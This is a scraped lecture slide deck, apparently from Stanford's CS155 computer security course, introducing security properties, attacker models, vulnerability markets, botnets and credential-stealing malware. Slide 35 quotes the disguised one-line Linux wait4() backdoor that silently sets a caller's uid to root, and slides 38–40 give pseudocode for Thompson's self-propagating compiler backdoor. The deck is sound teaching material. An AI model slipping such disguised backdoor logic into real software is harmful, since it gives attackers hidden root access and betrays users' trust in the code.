Upload
thanh-huong
View
215
Download
0
Embed Size (px)
Citation preview
7/29/2019 01 Intro Thompson
1/44
Computer andNetwork Security
Dan Boneh and John Mitchell
CS 155 Spring 2013
https://courseware.stanford.edu/pg/courses/CS155
7/29/2019 01 Intro Thompson
2/44
Whats this course about?
Intro to computer and network security
Some challenging fun projects Learn about attacks
Learn about preventing attacksLectures on related topics Application and operating system security
Web security
Network security, Mobile app security
Not a course on cryptography (take CS255!)
7/29/2019 01 Intro Thompson
3/44
Organization (subject to change)Application and OS security (5 lectures)
Buffer overflow project Vulnerabilities: control hijacking attacks, fuzzing Prevention: System design, robust coding, isolation
Web security (4 lectures) Web site attack and defenses project Browser policies, session mgmt, user authentication HTTPS and web application security
Network security (6 lectures) Network traceroute and packet filtering project Protocol designs, vulnerabilities, prevention Malware, botnets, DDoS, network security testing
A few other topics Cryptography (user perspective), digital rights management,
final guest lecture,
7/29/2019 01 Intro Thompson
4/44
General course info (see web)
Prerequisite: Operating systems (CS140)
Textbook: none reading online
Coursework
3 projects, 2 homeworks, final exam
grade: 0.25 H + 0.5 P + 0.25 F
Teaching assistants
Occasional optional section Introduction to project assignments
7/29/2019 01 Intro Thompson
5/44
7/29/2019 01 Intro Thompson
6/44
SECURITY CONCEPTS
7/29/2019 01 Intro Thompson
7/44
What is security?
System correctness
If user supplies expected input, system generatesdesired output
Security If attacker supplies unexpected input, system does
not fail in certain ways
7/29/2019 01 Intro Thompson
8/44
What is security?
System correctness
Good input Good output
Security
Bad input Bad output
7/29/2019 01 Intro Thompson
9/44
What is security?
System correctness
More features: better
Security
More features: can be worse
7/29/2019 01 Intro Thompson
10/44
Security properties
Confidentiality
Information about system or its users cannot belearned by an attacker
Integrity The system continues to operate properly, only
reaching states that would occur if there were noattacker
Availability Actions by an attacker do not prevent users from
having access to use of the system
7/29/2019 01 Intro Thompson
11/44
System
AttackerAlice
General picture
Security is about
Honest user (e.g., Alice, Bob, ) Dishonest Attacker
How the Attacker
Disrupts honest users use of the system (Integrity, Availability)
Learns information intended for Alice only (Confidentiality)
7/29/2019 01 Intro Thompson
12/44
Network Attacker
Intercepts andcontrols networkcommunication
Alice
System
Network security
7/29/2019 01 Intro Thompson
13/44
Web Attacker
Sets up malicioussite visited by
victim; no controlof network
Alice
System
Web security
7/29/2019 01 Intro Thompson
14/44
OS Attacker
Controls maliciousfiles and
applications
Alice
Operating system security
7/29/2019 01 Intro Thompson
15/44
System
AttackerAlice
Confidentiality:Attacker does not learn Alices secrets
Integrity:Attacker does not undetectably corrupt systems function for Alice
Availability:Attacker does not keep system from being useful to Alice
7/29/2019 01 Intro Thompson
16/44
TRENDS AND STATISTICS
7/29/2019 01 Intro Thompson
17/44
The computer security problem
Lots of buggy software (and gullible users)
Money can be made from finding andexploiting vulnerabilities.
Marketplace for vulnerabilities
Marketplace for owned machines (PPI)
Many methods to profit from owned client machines
7/29/2019 01 Intro Thompson
18/44
7/29/2019 01 Intro Thompson
19/44
Reported Web Vulnerabilities "In the Wild"
Data from aggregator and validator of NVD-reported vulnerabilities
7/29/2019 01 Intro Thompson
20/44
Web vs System vulnerabilities
Decline in % web vulns since 2009
49% in 2010 -> 37% in 2011.
Big decline in SQL Injection vulnerabilities
XSS peak
7/29/2019 01 Intro Thompson
21/44
Mobile Operating SystemsMobile OS Vulnerabilities Mobile OS Exploits
Source: IBM X-Force, Mar 2011
7/29/2019 01 Intro Thompson
22/44
Phishing?
7/29/2019 01 Intro Thompson
23/44
Bot networks
Continue to be major problem (e.g., Spam)
7/29/2019 01 Intro Thompson
24/44
THE MARKETPLACE FORVULNERABILITIES
7/29/2019 01 Intro Thompson
25/44
Marketplace for Vulnerabilities
Option 1: bug bounty programs
Google Vulnerability Reward Program: 3K $
Mozilla Bug Bounty program: 500$
Pwn2Own competition: 15K $
Option 2:
ZDI, iDefense: 2K 25K $
7/29/2019 01 Intro Thompson
26/44
Marketplace for Vulnerabilities
Option 3: black market
Source: Charlie Miller (securityevaluators.com/files/papers/0daymarket.pdf)
7/29/2019 01 Intro Thompson
27/44
Marketplace for owned machines
Pay-per-install (PPI) services
Own victims machine Download and install clients code
Charge client
Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)
spambot
keyloggerclients
PPIservice
Victims
Cost:
US 100-180$ / 1000 machinesAsia 7-8$ / 1000 machines
7/29/2019 01 Intro Thompson
28/44
ATTACKER GOALS, EXAMPLES
7/29/2019 01 Intro Thompson
29/44
The computer security problem
Lots of buggy software (and gullible users)
Money can be made from finding andexploiting vulnerabilities.
Marketplace for vulnerabilities
Marketplace for owned machines (PPI)
Many methods to profit from owned client machines
Wh hi
7/29/2019 01 Intro Thompson
30/44
Why own machines:IP address and bandwidth stealing
Attackers goal: look like a random Internet user
Use the infected machines IP address for:
Spam (e.g. the storm botnet)
Spamalytics: 1:12M pharma spams leads to purchase1:260K greeting card spams leads to infection
Denial of Service:
Services: 1 hour (20$), 24 hours (100$)
Click fraud (e.g. Clickbot.a)
7/29/2019 01 Intro Thompson
31/44
Why own machines:Steal user credentials
keylog for banking passwords, web passwords,gaming pwds
Example: SilentBanker (2007)
Bank
Malware injectsJavascript
Bank sends loginpage needed to login
When user submitsinformation, also sentto attacker
User requests login page
Similar mechanism usedby Zeus botnet
7/29/2019 01 Intro Thompson
32/44
Why own machines:Spread to isolated systems
Example: Stuxtnet
Windows infection
Siemens PCS 7 SCADA control software on Windows
Siemens device controller on isolated network
More on this later in course
7/29/2019 01 Intro Thompson
33/44
Drive-by Downloads
7/29/2019 01 Intro Thompson
34/44
Web attack toolkit: MPack
Basic setup Toolkit hosted on web server Infects pages on that server Page visitors get infected
Features Customized: determines
exploit on the fly, based onusers OS, browser, etc
Easy to use: managementconsole provides stats oninfection rates
Customer care toolkit can bepurchased with one-yearsupport contract!
7/29/2019 01 Intro Thompson
35/44
Insider attacks: example
Hidden trap door in Linux (nov 2003)
Allows attacker to take over a computer
Practically undetectable change (uncovered via CVSlogs)
Inserted line in wait4()
Looks like a standard error check, but
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
See: http://lwn.net/Articles/57135/
7/29/2019 01 Intro Thompson
36/44
WHAT CAN YOU TRUST?
7/29/2019 01 Intro Thompson
37/44
Ken Thompson
What code can we trust?
Consider "login" or "su" in Unix
Is RedHat binary reliable?
Does it send your passwd to someone?Can't trust binary so check source, recompile
Read source code or write your own
Does this solve problem?
Reflections on Trusting Trust, http://www.acm.org/classics/sep95/
7/29/2019 01 Intro Thompson
38/44
Compiler backdoor
This is the basis of Thompson's attack
Compiler looks for source code that looks like loginprogram
If found, insert login backdoor (allow special userto log in)
How do we solve this?
Inspect the compiler source
7/29/2019 01 Intro Thompson
39/44
C compiler is written in C
Change compiler source S
compiler(S) {
if (match(S, "login-pattern")) {
compile (login-backdoor)
return
}
if (match(S, "compiler-pattern")) {
compile (compiler-backdoor)
return}
.... /* compile as usual */
}
7/29/2019 01 Intro Thompson
40/44
Clever trick to avoid detection
Compile this compiler and delete backdoor tests fromsource
Someone can compile standard compiler source to get newcompiler, then compile login, and get login with backdoor
Simplest approach will only work once Compiling the compiler twice might lose the backdoor
But can making code for compiler backdoor output itself
(Can you write a program that prints itself? Recursion thm)
Read Thompson's article Short, but requires thought
7/29/2019 01 Intro Thompson
41/44
CONCLUDING
7/29/2019 01 Intro Thompson
42/44
Ethical use of security information
We discuss vulnerabilities and attacks
Most vulnerabilities have been fixed
Some attacks may still cause harm
Do not try these at home or anyplace elsePurpose of this class
Learn to prevent malicious attacks
Use knowledge for good purposes
7/29/2019 01 Intro Thompson
43/44
If you remember only one thing from this course:
A vulnerability that is
too complicated for anyone to ever find
will be found and exploited !
We hope you remember more than one thing
7/29/2019 01 Intro Thompson
44/44